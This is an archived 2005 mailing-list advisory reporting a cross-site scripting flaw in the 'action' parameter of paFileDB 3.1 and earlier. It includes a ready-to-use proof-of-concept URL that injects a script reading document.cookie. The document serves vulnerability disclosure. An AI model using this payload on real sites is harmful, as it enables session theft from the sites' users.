OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Pafiledb ACTION Parameter XSS

From: tom cruise (the.n3tgmail.com)
Date: Fri Apr 08 2005 - 16:23:59 CDT


Vulnerable System :
paFileDB 3.1
and less

exploit :
http://[target]/pafiledb.php?action="><script>alert(document.cookie)</script>

discovered by : neO

SecurityGurus Team
www.securitygurus.net